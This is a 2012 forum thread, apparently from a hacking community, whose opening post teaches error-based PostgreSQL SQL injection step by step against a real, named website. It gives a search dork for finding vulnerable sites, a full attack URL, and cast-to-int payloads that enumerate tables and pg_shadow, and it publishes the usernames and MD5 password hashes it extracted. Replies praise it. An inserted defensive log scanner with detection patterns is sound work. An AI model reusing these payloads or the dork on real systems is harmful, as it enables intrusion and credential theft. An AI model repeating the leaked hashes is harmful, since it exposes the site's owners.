Sheyken, posted August 4, 2012 (edited)

I would like to start my activity on RST with a topic that will bring "benefits" to the community, or to the users of this community.

Most of you probably know the easiest SQL Injection methods [the main ones]: MySQL Injection, Union Based or Blind, etc.

I thought I would make a tutorial for those who "would like" to advance in injections, and that is: a tutorial about PostgreSQL Injection.

---------------------------

As usual we take a site; I was in a hurry and picked a site [with the help of Google, through the dork -> inurl:.php? intext:Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: ]

OK, let's start the "practical" part:

[1] If we were to start from zero, we would look for the database version. To find the version, the following query is needed:

and 1=cast(version() as int)--

In my case:

[2] We continue by finding the tables in the database. To find the first table, the following query is needed:

and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--

In my case:

The first table in the database is pg_type.

To move on to the next table, the following query is needed:

and 1=cast((select table_name from information_schema.tables where table_name not in ('TABEL') limit 1 offset 0) as int)--

In my case:

and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type') limit 1 offset 0) as int)--

The next table is: pg_attribute

We will continue the injection; I took a shortcut and went to the table that interests me [the one with users].

Full query:

http://www.aspem.org/indexa.php?p=290&p1=-80' and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type','pg_attribute','user_mapping_options','user_mappings','tables','triggered_update_columns','triggers','usage_privileges','view_column_usage','view_routine_usage','view_table_usage','views','data_type_privileges','element_types','_pg_foreign_data_wrappers','foreign_data_wrapper_options','foreign_data_wrappers','pg_statistic','_pg_foreign_servers','foreign_server_options','foreign_servers','_pg_user_mappings','schemata','sequences','sql_features','sql_implementation_info','sql_languages','sql_packages','pg_database','pg_authid','pg_roles') limit 1 offset 0) as int)--+

The table with users is pg_shadow.

[3] We continue by extracting the columns from the pg_shadow table. The following query is needed:

and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 0) as int)--

In my case:

First column: usename

To extract the next column, the following change to the query above is needed:

and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 1) as int)--

Second column: usesysid

We jump... straight to the column that interests us, the "passwd" column.

and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 5) as int)--

We have the columns that interest us: usename & passwd.

[4] Let's continue; we will have to extract the data from usename & passwd. The following query is needed:

and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)--

First user:
Second user: postgres
Third user: salvataggi

First password, for the user aspem. You need the following query:

and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)--

I will skip the part with the rest of the screenshots [because you can manage on your own, "you're big boys"].

All users & passwords:

User: aspem
Password: 4e8991501921aa20346da7d0ea86fe35 [MD5]

User: postgres
Password: 142484a40d02122af06bc427d4367d73 [MD5]

User: salvataggi
Password: No password.

----------------------------

Thank you for "wasting" your time on this tutorial, which maybe [you already knew].

Edited August 4, 2012 by Sheyken
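
A defender's view of the requests described in the post above, as an added example that is not part of the original thread: a scanner that URL-decodes access-log request targets (including double encoding) and flags clients whose parameters combine the cast-to-int error trick with catalog enumeration. The log lines, paths, rule names and patterns are constructed assumptions modelled on the payload shapes quoted in the post.

```python
import re
from urllib.parse import unquote_plus

# Rule names and patterns are assumptions modelled on the payload shapes quoted above.
RULES = {
    "cast_to_int": re.compile(r"cast\s*\(.{0,300}?\bas\s+int"),
    "version_probe": re.compile(r"\bversion\s*\(\s*\)"),
    "catalog_enum": re.compile(
        r"\b(?:information_schema\.(?:tables|columns)|pg_shadow|pg_authid)\b"),
    "paged_subquery": re.compile(r"\blimit\s+1\s+offset\s+\d+"),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

# Constructed access-log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Aug/2012:09:59:58 +0000] "GET /item.php?id=7 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [04/Aug/2012:09:59:59 +0000] "GET /search.php?q=limit+1+offset+0 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [04/Aug/2012:10:00:01 +0000] "GET /item.php?id=7%27%20and%201=cast(version()%20as%20int)-- HTTP/1.1" 200 812',
    '198.51.100.7 - - [04/Aug/2012:10:00:09 +0000] "GET /item.php?id=7%2527%2520and%25201%253Dcast((select%2520table_name%2520from%2520information_schema.tables%2520limit%25201%2520offset%25200)%2520as%2520int)-- HTTP/1.1" 200 790',
    '198.51.100.7 - - [04/Aug/2012:10:00:15 +0000] "GET /item.php?id=7%27+and+1=cast((select+passwd+from+pg_shadow+limit+1+offset+0)+as+int)-- HTTP/1.1" 200 801',
]

def normalize(raw, rounds=3):
    """URL-decode until stable (catches double encoding), drop /* */ comments, lowercase."""
    for _ in range(rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    raw = re.sub(r"/\*.*?\*/", " ", raw, flags=re.S)
    return re.sub(r"\s+", " ", raw).lower()

def scan(lines):
    """Return {client_ip: {"requests": n, "rules": set}} for suspicious requests."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = normalize(m["target"].partition("?")[2])
        matched = {name for name, rx in RULES.items() if rx.search(query)}
        if len(matched) >= 2:  # a single weak signal alone is not flagged
            entry = findings.setdefault(m["ip"], {"requests": 0, "rules": set()})
            entry["requests"] += 1
            entry["rules"] |= matched
    return findings

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info["requests"], sorted(info["rules"]))
```

Access logs only show GET parameters; the error text from the dork above, "invalid input syntax for integer", is the matching signal to search for in the application's and PostgreSQL's own error logs.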

Guest Kovalski, posted August 4, 2012

Congratulations, nice tutorial and well explained. Welcome to RST.

Sheyken (author), posted August 5, 2012

I'm glad you liked it. I'll try to make more tutorials when I have free time.

daNNy.bv, posted August 15, 2012

Nice.. Could you post a pack of SQLi tutorials? I really want to learn to do it manually... I'm fed up with the little carrot.

LegioNRST, posted August 15, 2012

Thanks, I needed this because I don't know how to do it manually.

Sheyken (author), posted August 15, 2012

I might do an MsSQL Injection tutorial next; if I have free time I will do it.

2time, posted August 17, 2012

Very useful, keep it up.

Radu04, posted August 27, 2012

Wow! Finally a well-explained tutorial. From now on I promise I won't use the "carrot" anymore.

.Slacker, posted August 27, 2012

Useful.

thawwatty, posted July 1, 2015

Great tutorial bro, something is new for me. Thanks for sharing.